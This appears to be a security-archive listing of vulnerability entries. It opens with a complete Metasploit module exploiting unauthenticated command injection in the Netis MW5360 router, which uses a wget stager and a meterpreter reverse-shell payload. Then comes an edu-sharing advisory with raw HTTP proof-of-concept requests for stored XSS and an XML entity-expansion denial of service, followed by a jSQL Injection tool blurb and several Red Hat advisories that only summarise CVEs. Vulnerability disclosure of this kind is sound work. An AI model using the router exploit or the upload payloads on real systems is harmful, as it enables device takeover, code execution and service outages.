The Netis MW5360 router has a command injection vulnerability via the password parameter on the login page. The vulnerability stems from improper handling of the "password" parameter within the router's web interface. The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to V1.0.1.3442 are vulnerable. Attackers can inject a command in the password parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take control of the router.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Netis router MW5360 unauthenticated RCE.',        'Description' => %q{          Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.          The vulnerability stems from improper handling of the "password" parameter within the router's web interface.          The router's login page authorization can be bypassed by simply deleting the authorization header,          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker          to take control of the router.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Adhikara13' # Discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-22729'],          ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']        ],        'DisclosureDate' => '2024-01-11',        'Platform' => ['linux'],        'Arch' => [ARCH_MIPSLE],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_MIPSLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])    ])  end  def execute_command(cmd, _opts = {})    # cleanup payload file when session is established.    if cmd.include?('chmod +x')      register_files_for_cleanup(cmd.split('+x')[1].strip)    end    # skip last command to remove payload because it does not work    unless cmd.include?('rm -f')      payload = Base64.strict_encode64("`#{cmd}`")      print_status("Executing #{cmd}")      send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),        'vars_post' => {          'password' => payload,          'quick_set' => 'ap',          'app' => 'wan_set_shortcut'        }      })    end  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),      'vars_post' => {        'mode_name' => 'skk_get',        'wl_link' => 0      }    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')    # trying to get the model and version number    # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)    # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison    unless version.nil?      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop      # The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3D      if version[2].upcase.split('-V')[0].include?('-')        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')      else        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')      end      # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower      if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))        return CheckCode::Appears(version[2].chop.to_s)      end      return CheckCode::Safe(version[2].chop.to_s)    end    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed      execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])    end  endend

Netis MW5360 Remote Command Execution

Edu-Sharing suffers from an arbitrary file upload vulnerability. Versions below 8.0.8-RC2, 8.1.4-RC0, and 9.0.0-RC19 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20240620-0 >  
=======================================================================  
               title: Arbitrary File Upload  
             product: edu-sharing (metaVentis GmbH)  
vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19  
      fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19  
          CVE number: CVE-2024-28147  
              impact: high  
            homepage: https://edu-sharing.com  
               found: 2024-04-04  
                  by: Kai Zimmermann (Office Frankfurt)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"edu-sharing software enables you to network your learning platforms and other  
educational software. Share learning content, metadata and tools - make them  
available in an educational cloud and let your users use them in all connected  
systems."

Source: https://edu-sharing.com

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can upload arbitrary files in the upload function for  
collection preview images. An attacker may upload an HTML file that includes  
malicious JavaScript code which will be executed if a user visits the direct  
URL of the collection preview image (Stored Cross Site Scripting). It is also  
possible to upload SVG files that include nested XML entities. Those are parsed  
when a user visits the direct URL of the collection preview image, which may be  
utilized for a Denial of Service attack.

Proof of concept:  
-----------------  
1) Arbitrary File Upload (CVE-2024-28147)  
An authenticated user can update the preview image of an existing collection  
by sending the following request:

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288

-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";

‰PNG

[...]  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------

The URL parameter "mimetype" can be modified to match any uploaded file. The  
value is directly used in the server's "Content-Type" header.  
Both, the Content-Type request header and the filename parameter in the  
Content-Disposition request header do not need to be included in the data  
boundary inside the request in order to be sent successfully and can therefore  
be removed.  
The preview image can then be accessed by visiting the following URL:  
https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID

a. Stored Cross Site Scripting (HTML Upload)  
The initial request can be modified to include an HTML file, while keeping  
the magic bytes of a PNG image file. The "mimetype" parameter is changed to  
"text/html":

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885  
Content-Length: 288

-----------------------------159605426213527963452762824885  
Content-Disposition: form-data; name="file";

‰PNG

<!DOCTYPE html>  
<html>  
<body>  
<h1>Test</h1>  
<script>alert(window.location)</script>  
</body>  
</html>  
-----------------------------159605426213527963452762824885--  
--------------------------------------------------------------------------------

Visiting the preview URL as seen in figure 1 below shows that the JavaScript  
code is executed:  
[01_stored_xss.png]

b. Denial of Service (SVG Upload)  
The initial request can be modified to upload an SVG file containing  
nested XML entities. The "mimetype" parameter is changed to "image%2Fsvg":

--------------------------------------------------------------------------------  
POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1  
Host: $SERVER  
Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID  
Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803  
Content-Length: 581

-----------------------------29539943986372261721095197803  
Content-Disposition: form-data; name="file";

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1   
"&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]>  
<svg xmlns="http://www.w3.org/2000/svg">  
  <data>&t2;</data>  
</svg>

-----------------------------29539943986372261721095197803--  
--------------------------------------------------------------------------------

Visiting the preview URL as seen in figure 2 below shows that the XML code is  
parsed:  
[02_denial_of_service]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 9.0 (pre-release)

The vendor confirmed that previous versions (8.0 and 8.1) are affected as well.

Vendor contact timeline:  
------------------------  
2024-04-10: Contacting vendor through security@edu-sharing.com  
2024-04-11: Vendor replied and confirmed security contact.  
             Advisory information has been sent to vendor.  
2024-04-12: Vendor confirmed receiving the advisory and is now trying to  
             reproduce the described behavior.  
2024-05-03: Reminder sent to security@edu-sharing.com, asking for an update on  
             fixing the vulnerability.  
2024-05-07: Vendor provides affected versions. Fixes have already been implemented  
             and published. Vendor is requesting to wait with the public advisory  
             release in order to allow affected customers to perform the next rollout.  
2024-05-07: Vendor provides fixed versions.  
             Public advisory release scheduled for 2024-06-04.  
2024-05-15: Public advisory release postponed to 2024-06-20.  
2024-06-20: Coordinated release of advisory.

Solution:  
---------  
The repository base version in use can be identified in the Admin-Tools.  
The vendor provides a patch for the affected versions:  
* Version 8.0: Update repository version to "8.0.8-RC2" or later  
* Version 8.1: Update repository version to "8.1.4-RC0" or later  
* Version 9.0: Update repository version to "9.0.0-RC19" or later

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Kai Zimmermann / 2024

Edu-Sharing Arbitrary File Upload

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.100

Red Hat Security Advisory 2024-4058-03 - An update for python3.11 is now available for Red Hat Enterprise Linux 8. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4058.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python3.11 security updateAdvisory ID:        RHSA-2024:4058-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4058Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2023-6597====================================================================Summary: An update for python3.11 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: Path traversal on tempfile.TemporaryDirectory (CVE-2023-6597)* python: The zipfile module is vulnerable to zip-bombs leading to denial of service (CVE-2024-0450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6597References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2276518https://bugzilla.redhat.com/show_bug.cgi?id=2276525

Red Hat Security Advisory 2024-4058-03

Red Hat Security Advisory 2024-4057-03 - Release of OpenShift Serverless Logic 1.33.0. Issues addressed include cross site scripting and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4057.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Release of OpenShift Serverless Logic 1.33.0 security update & enhancements  
Advisory ID:        RHSA-2024:4057-03  
Product:            Red Hat OpenShift Serverless  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4057  
Issue date:         2024-06-24  
Revision:           03  
CVE Names:          CVE-2023-6717  
====================================================================

Summary: 

Release of OpenShift Serverless Logic 1.33.0

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release includes security, bug fixes, and enhancements.

Security Fix(es):

* keycloak: org.keycloak.protocol.oidc: unvalidated cross-origin messages in checkLoginIframe leads to DDoS (CVE-2024-1249)

* keycloak: XSS via assertion consumer service URL in SAML POST-binding flow (CVE-2023-6717)

* pgjdbc: PostgreSQL JDBC Driver allows attacker to inject SQL if using PreferQueryMode=SIMPLE (CVE-2024-1597)

* camel-core: Exposure of sensitive data by crafting a malicious EventFactory (CVE-2024-22371)

* commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file (CVE-2024-25710)

* commons-compress: OutOfMemoryError unpacking broken Pack200 file (CVE-2024-26308)

* jose4j: denial of service via specially crafted JWE (CVE-2023-51775)

For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.

Solution:

https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.33

CVEs:

CVE-2023-6717

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.33  
https://bugzilla.redhat.com/show_bug.cgi?id=2253952  
https://bugzilla.redhat.com/show_bug.cgi?id=2262918  
https://bugzilla.redhat.com/show_bug.cgi?id=2264988  
https://bugzilla.redhat.com/show_bug.cgi?id=2264989  
https://bugzilla.redhat.com/show_bug.cgi?id=2266024  
https://bugzilla.redhat.com/show_bug.cgi?id=2266523  
https://bugzilla.redhat.com/show_bug.cgi?id=2266921

Red Hat Security Advisory 2024-4057-03

Red Hat Security Advisory 2024-4054-03 - An update for python-gunicorn is now available for Red Hat OpenStack Platform 16.2. Issues addressed include a HTTP request smuggling vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4054.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenStack Platform 16.2 (python-gunicorn) security updateAdvisory ID:        RHSA-2024:4054-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4054Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2024-1135====================================================================Summary: An update for python-gunicorn is now available for Red Hat OpenStackPlatform 16.2 (Train).Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Gunicorn (Green Unicorn) is a Python WSGI HTTP server for UNIX.Security Fix(es):* HTTP Request Smuggling due to improper validation of Transfer-Encodingheaders (CVE-2024-1135)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1135References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275280

Red Hat Security Advisory 2024-4054-03

Red Hat Security Advisory 2024-4053-03 - An update for python-yaql, openstack-tripleo-heat-templates, and openstack-tripleo-common is now available for Red Hat OpenStack Platform 16.2. Issues addressed include an information leakage vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4053.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenStack Platform 16.2 security updateAdvisory ID:        RHSA-2024:4053-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4053Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2024-29156====================================================================Summary: An update for python-yaql, openstack-tripleo-heat-templates, and openstack-tripleo-common is now available for Red Hat OpenStack Platform 16.2 (Train).Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Affected components:* python-yaql: a library that contains a large set of commonly used functions* openstack-tripleo-heat-templates: Heat templates for TripleO* openstack-tripleo-common: Python library for code used by TripleO projectsSecurity Fix(es):* OpenStack Murano Component Information Leakage (CVE-2024-29156)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-29156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2269112

Red Hat Security Advisory 2024-4053-03

Red Hat Security Advisory 2024-4052-03 - An update for dnsmasq is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4052.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: dnsmasq security updateAdvisory ID:        RHSA-2024:4052-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4052Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2023-28450====================================================================Summary: An update for dnsmasq is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.Security Fix(es):* dnsmasq: default maximum EDNS.0 UDP packet size was set to 4096 but should be 1232 (CVE-2023-28450)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-28450References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2178948

Red Hat Security Advisory 2024-4052-03

Red Hat Security Advisory 2024-4051-03 - An update for pki-core is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4051.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-core security updateAdvisory ID:        RHSA-2024:4051-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4051Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2023-4727====================================================================Summary: An update for pki-core is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* dogtag ca: token authentication bypass vulnerability (CVE-2023-4727)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4727References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2232218

Red Hat Security Advisory 2024-4051-03

Red Hat Security Advisory 2024-4050-03 - An update for libreswan is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4050.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreswan security updateAdvisory ID:        RHSA-2024:4050-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4050Issue date:         2024-06-24Revision:           03CVE Names:          CVE-2024-3652====================================================================Summary: An update for libreswan is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network (VPN).Security Fix(es):* libreswan: IKEv1 default AH/ESP responder can crash and restart (CVE-2024-3652)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3652References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2274448

Tag

#js